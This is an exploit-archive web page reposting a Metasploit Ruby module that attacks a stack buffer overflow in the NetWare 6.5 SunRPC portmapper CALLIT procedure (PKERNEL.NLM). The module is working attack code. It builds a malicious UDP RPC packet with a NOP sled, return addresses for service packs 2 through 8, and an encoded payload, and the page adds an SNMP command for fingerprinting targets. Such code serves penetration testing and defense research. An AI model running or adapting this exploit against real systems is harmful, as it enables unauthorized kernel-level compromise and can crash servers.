首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:pahtzo 发布时间:2010-11-17  
##
# $Id: pkernel_callit.rb 11039 2010-11-14 19:03:24Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking
	
	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
				PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
				The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
				cause the operating system to reboot.
			},
			'Author'         => [ 'pahtzo', ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11039 
, 'References' => [ # There is no CVE for this vulnerability [ 'BID', '36564' ], [ 'OSVDB', '58447' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-067/' ], ], 'Privileged' => true, 'Payload' => { 'Space' => 2020, }, 'Platform' => 'netware', 'Targets' => [ # NetWare SP and PKERNEL.NLM version can be found in SNMP: # snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm" # sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 2008 # hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)" [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm) ], 'DisclosureDate' => 'Sep 30 2009')) register_options([Opt::RPORT(111)], self.class) end def exploit connect_udp buf = [rand(0xffffffff)].pack('N') # XID buf << [0].pack('N') # Message Type: Call (0) buf << [2].pack('N') # RPC Version: 2 buf << [100000].pack('N') # Program: Portmap (100000) buf << [2].pack('N') # Program Version: 2 buf << [5].pack('N') # Procedure: CALLIT (5) buf << [0].pack('N') # Credentials AUTH_NULL (0) buf << [0].pack('N') # Length: 0 buf << [0].pack('N') # Verifier AUTH_NULL (0) buf << [0].pack('N') # Length: 0 buf << [0].pack('N') # Program: Unknown (0) buf << [1].pack('N') # Version: 1 buf << [1].pack('N') # Procedure: proc-1 (1) buf << [4097].pack('N') # Arguments: <DATA> length: 4097 buf << make_nops(2072) # fill to ret buf << [target.ret].pack('V') # addr. of push esp - ret buf << payload.encoded # # print_status("payload space #{payload_space()}...") # print_status("payload len #{payload.encoded.length}...") # print_status("total buf len #{buf.length}...") print_status("Trying target #{target.name}...") udp_sock.put(buf) handler disconnect_udp end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Axis2 / SAP BusinessObjects ds
·Safari 5.02 Stack Overflow Den
·Trend Micro Internet Security
·DIZzy 1.12 Local Stack Overflo
·Android 2.0/2.1 Use-After-Free
·chCounter <= 3.1.3 SQL Injecti
·Foxit Reader 4.1.1 Stack Overf
·MP3-Nator Buffer Overflow (SEH
·Mosets Tree 2.1.6 (Joomla) Tem
·DATAC RealWin SCADA Server Buf
·Xion Audio Player 1.0.126 Buff
·Realtek HD Audio Control Panel
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved